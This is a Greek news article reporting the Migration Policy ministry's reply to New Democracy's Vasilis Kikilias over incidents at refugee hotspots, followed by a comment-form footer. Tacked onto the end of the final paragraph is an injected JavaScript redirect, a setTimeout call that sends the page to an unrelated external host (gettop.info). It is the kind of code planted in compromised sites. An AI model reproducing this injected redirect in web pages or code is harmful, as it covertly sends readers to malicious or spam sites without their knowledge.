Μουζάλας εναντίον Κικίλια και ΝΔ για το μεταναστευτικό

0
6

 

Tο υπουργείο Μεταναστευτικής Πολιτικής σε ανακοίνωση που εξέδωσε επισημαίνει την ανάδειξη του προσφυγικού σε «εθνικό ζήτημα που επιζητεί τη συμβολή όλων των δυνάμεων του δημοκρατικού τόξου με πνεύμα συνεννόησης και συναίνεσης».

Μάλιστα, απαντώντας σε δηλώσεις του συντονιστή Μεταναστευτικής Πολιτικής της ΝΔ Βασίλη Κικίλια, σχετικά με τα επεισόδια στα hotspots, το υπουργείο Μεταναστευτικής Πολιτικής κατηγορεί το κόμμα της αξιωματικής αντιπολίτευσης για ανάδειξη μεμονωμένων περιστατικών που συμβάλλει «στην όξυνση της έντασης».

«Επιλέγουμε να μην ανασύρουμε πρακτικές που χρησιμοποιήθηκαν στο παρελθόν και έχουν καταδικαστεί σε νομικό και διπλωματικό επίπεδο. Επιλέγουμε να μην σταθούμε σε αμέλειες και παραλείψεις που κληθήκαμε να αντιμετωπίσουμε. Επιλέγουμε να μην αναδεικνύουμε, με την συχνότητα που βρισκόμαστε αντιμέτωποι, το κενό που παραλάβαμε σε πολλά επίπεδα σχετικά με το προσφυγικό – μεταναστευτικό ζήτημα», σημειώνει το υπουργείο, και συνεχίζει: «Θα συνεχίσουμε να κινούμαστε βάσει των επιλογών που προαναφέρουμε, αυτό όμως απαιτεί αμοιβαία πολιτική βούληση και αίσθηση ευθύνης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here